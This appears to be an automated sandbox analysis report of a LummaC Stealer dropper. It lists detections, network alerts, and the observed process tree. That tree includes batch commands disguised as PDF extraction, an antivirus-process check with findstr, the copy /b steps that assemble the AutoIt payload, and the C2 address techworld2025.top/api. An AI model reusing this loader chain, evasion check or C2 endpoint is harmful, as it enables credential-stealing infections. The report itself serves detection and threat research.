Edit tour

Windows Analysis Report
#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Overview

General Information

Sample name:	#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe renamed because original name is a hash value
Original sample name:	.exe
Analysis ID:	1631838
MD5:	5c4ca3e7135a0641ac01fbd73cd90ca8
SHA1:	8297854dea681618bf432d5086dcd833aa416530
SHA256:	4366cb256d6331d8634dff8847c2334e18baefa6b7f41ae2db3a8801a0aa9a72
Tags:	AutoITexeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer

Score:	96
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Drops PE files with a suspicious file extension

Joe Sandbox ML detected suspicious sample

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe" MD5: 5C4CA3E7135A0641AC01FBD73CD90CA8)

cmd.exe (PID: 7472 cmdline: "C:\Windows\system32\cmd.exe" /c expand Increases.pdf Increases.pdf.bat & Increases.pdf.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

expand.exe (PID: 7528 cmdline: expand Increases.pdf Increases.pdf.bat MD5: 544B0DBFF3F393BCE8BB9D815F532D51)

tasklist.exe (PID: 7544 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7552 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7588 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7596 cmdline: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7632 cmdline: cmd /c md 119035 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 7648 cmdline: extrac32 /Y /E Leads.pdf MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 7672 cmdline: findstr /V "Die" Protecting MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7688 cmdline: cmd /c copy /b 119035\Cuba.com + Handhelds + Phases + Merger + Convenient + Pickup + Den + Agent + Intimate + Architect + Apparent + Relatively 119035\Cuba.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7704 cmdline: cmd /c copy /b ..\Updates.pdf + ..\Florence.pdf + ..\Pastor.pdf + ..\Exceptions.pdf + ..\Anthropology.pdf + ..\Oriented.pdf + ..\Completion.pdf + ..\Launched.pdf R MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Cuba.com (PID: 7720 cmdline: Cuba.com R MD5: 62D09F076E6E0240548C2F837536A46A)

choice.exe (PID: 7736 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c expand Increases.pdf Increases.pdf.bat & Increases.pdf.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7472, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , ProcessId: 7596, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T16:28:29.760030+0100	2028371	3	Unknown Traffic	192.168.2.4	49719	172.67.189.153	443	TCP
2025-03-07T16:28:31.730782+0100	2028371	3	Unknown Traffic	192.168.2.4	49720	172.67.189.153	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T16:28:30.262474+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49719	172.67.189.153	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T16:28:30.262474+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49719	172.67.189.153	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://techworld2025.top/api

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Virustotal: Detection: 45%			Perma Link
Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	ReversingLabs: Detection: 31%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.8% probability

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.189.153:443 -> 192.168.2.4:49719 version: TLS 1.2

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\119035	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\119035\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49719 -> 172.67.189.153:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49719 -> 172.67.189.153:443

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49720 -> 172.67.189.153:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49719 -> 172.67.189.153:443

Source: global traffic

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: techworld2025.top

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: RemCXcBAgdPicYq.RemCXcBAgdPicYq
Source: global traffic	DNS traffic detected: DNS query: techworld2025.top

Source: unknown

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 15:28:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JaCD22OZy5PRqXX8TZ73IT0k1nGq5tNq4RbLyBkPZip1RhON0sb8nA%2BrIp4L2mckpy4Mi6RVEN8%2FTAlXkJf%2BUW5vDe53ZfVNWMKiHYe%2FFwh09IAQPk2L5aciWFYHDkCtDr%2FfTA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cb1f7bfcfd0f93-EWR

Source: Cuba.com.2.dr, Relatively.10.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Cuba.com.2.dr, Relatively.10.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Cuba.com.2.dr, Relatively.10.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Cuba.com.2.dr, Relatively.10.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Cuba.com.2.dr, Relatively.10.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Cuba.com.2.dr, Relatively.10.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Cuba.com.2.dr, Relatively.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Cuba.com.2.dr, Relatively.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Cuba.com.2.dr, Relatively.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Cuba.com.2.dr, Relatively.10.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Cuba.com.2.dr, Relatively.10.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Cuba.com, 0000000E.00000000.1250404611.0000000001085000.00000002.00000001.01000000.00000009.sdmp, Architect.10.dr, Cuba.com.2.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Cuba.com.2.dr, Relatively.10.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Relatively.10.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719

Source: unknown

HTTPS traffic detected: 172.67.189.153:443 -> 192.168.2.4:49719 version: TLS 1.2

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050CD

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044A5

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,

0_2_00403883

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	File created: C:\Windows\PremiumVillage			Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	File created: C:\Windows\ThrowsChose			Jump to behavior

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_004074BB	0_2_004074BB

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\119035\Cuba.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Code function: String function: 004062A3 appears 58 times

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Static PE information: Section: .reloc ZLIB complexity 0.99853515625

Source: classification engine

Classification label: mal96.troj.evad.winEXE@28/26@2/1

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

0_2_004044A5

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

File created: C:\Users\user\AppData\Local\Temp\nst91E3.tmp

Jump to behavior

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Increases.pdf Increases.pdf.bat & Increases.pdf.bat

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Virustotal: Detection: 45%
Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

File read: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe "C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe"
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Increases.pdf Increases.pdf.bat & Increases.pdf.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\expand.exe expand Increases.pdf Increases.pdf.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 119035
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Leads.pdf
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Die" Protecting
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 119035\Cuba.com + Handhelds + Phases + Merger + Convenient + Pickup + Den + Agent + Intimate + Architect + Apparent + Relatively 119035\Cuba.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Updates.pdf + ..\Florence.pdf + ..\Pastor.pdf + ..\Exceptions.pdf + ..\Anthropology.pdf + ..\Oriented.pdf + ..\Completion.pdf + ..\Launched.pdf R
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\119035\Cuba.com Cuba.com R
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Increases.pdf Increases.pdf.bat & Increases.pdf.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\expand.exe expand Increases.pdf Increases.pdf.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 119035	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Leads.pdf	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Die" Protecting	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 119035\Cuba.com + Handhelds + Phases + Merger + Convenient + Pickup + Den + Agent + Intimate + Architect + Apparent + Relatively 119035\Cuba.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Updates.pdf + ..\Florence.pdf + ..\Pastor.pdf + ..\Exceptions.pdf + ..\Anthropology.pdf + ..\Oriented.pdf + ..\Completion.pdf + ..\Launched.pdf R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\119035\Cuba.com Cuba.com R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
